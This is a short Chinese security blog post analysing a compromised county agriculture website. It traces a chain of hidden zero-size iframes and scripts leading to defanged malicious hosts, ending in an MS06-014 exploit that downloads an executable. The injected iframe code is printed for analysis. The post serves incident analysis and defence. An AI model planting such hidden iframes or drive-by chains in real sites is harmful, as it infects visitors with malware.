某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等

简介: 某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等

打开该网站后IE失去响应……

在该网站首页底部发现代码:

/---
<iframe src="hxxp://8**8.8*812**15.com/88.htm" width=0 height=0></iframe>
---/

1 hxxp://8**8.8*812**15.com/88.htm

包含代码:

/---
<iframe src="hxxp://8**8.8*812**15.com/in.htm" width=0 height=0></iframe>
<iframe src="hxxp://ga**.mm*52**08.com/w.htm" width=0 height=0></iframe>
<iframe src="hxxp://d**v.5**51*89.net/" width=0 height=0></iframe>
<iframe src="hxxp://a*1**.sb**b2*2.com/a.htm" width=0 height=0></iframe>
<iframe src="hxxp://s*f*.07**08*08.net/sf.htm" width=0 height=0></iframe>
---/

1.1 hxxp://8**8.8*812**15.com/in.htm

包含代码:

/---
<iframe src="hxxp://y**un.y**un8**78.com/web/6619038.htm" width=100 height=0></iframe>
---/

1.1.1 hxxp://y**un.y**un8**78.com/web/6619038.htm

包含代码:

/---
<iframe src=htm.html width=100 height=0></iframe>
---/

1.1.1.1 hxxp://y**un.y**un8**78.com/web/htm.html输出代码:

/---
<script src=hxxp://y**un.y**un8**78.com/web/1.js></script>
<script src=hxxp://y**un.y**un8**78.com/web/bf.js></script>
<script src=hxxp://y**un.y**un8**78.com/web/pps.js></script>
<iframe width='10'height='10'src='hxxp://y**un.y**un8**78.com/web/3.htm'></iframe>
<script src=hxxp://y**un.y**un8**78.com/web/pps.js></script>
<iframe width='100' height='0' src='hxxp://y**un.y**un8**78.com/web/2.htm'></iframe>
<iframe width=100 height=0 src=hxxp://y**un.y**un8**78.com/web/0.htm></iframe>
---/

1.1.1.1.1 hxxp://y**un.y**un8**78.com/web/1.js

利用 MS06-014: msadco.dll 严重漏洞 下载 hxxp://y**un.y**un8**78.com/14.exe


相关文章
|
2月前
|
Web App开发 安全
某县农业信息网挂马 Worm.Win32.AutoRun.umf
某县农业信息网挂马 Worm.Win32.AutoRun.umf
|
2月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
|
2月前
|
开发框架 安全 .NET
X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
|
2月前
|
安全 JavaScript 前端开发
小心冒充瑞星专家的病毒ravexp.exe
小心冒充瑞星专家的病毒ravexp.exe
|
2月前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
|
安全 网络安全 Windows
向日葵RCE(CNVD-2022-10270)
向日葵RCE(CNVD-2022-10270)
213 0
|
安全
Windows10被曝漏洞,受害者电脑沦为“肉鸡”
一旦被攻击者利用,电脑里的任何应用都可能拥有系统权限,攻击者可以执行危害级别更高的恶意行为,受害者电脑沦为“肉鸡”。
440 0
|
安全 Windows
Windows 7 RC版曝出首个0day漏洞 可致电脑蓝屏
5月14日消息,360安全中心透露,其研究人员近日发现微软Windows7操作系统的RC版(发布候选版)存在一个严重的内核安全漏洞,该漏洞与此前Win7测试版曝出的产品Bug和Windows NT时期的漏洞均不同,是Win7自全球公开测试以来首个0day漏洞。
1395 0
|
监控 安全 机器人
10大最危险IT技术 病毒和Windows纳米上榜
据国外媒体报道,英国知名IT网站Vnunet日前评出了10大最危险的IT技术,计算机病毒和Windows操作系统等纷纷上榜。 几乎任何技术都具有两面性,在有利于社会发展的同时,也可能对社会造成莫大伤害。
1164 0
|
云安全 安全
瑞星杀毒网络版2010发布 称可查杀99.9%木马
4月15日,亚洲最大的信息安全厂商瑞星公司召开隆重发布会,正式发布2010年企业级旗舰产品——“瑞星杀毒软件网络版2010”系列。该系列产品包括六种版本,产品适用范围覆盖了小型企业、大中型企业、金融机构以及政府单位等所有企业级用户。
1136 0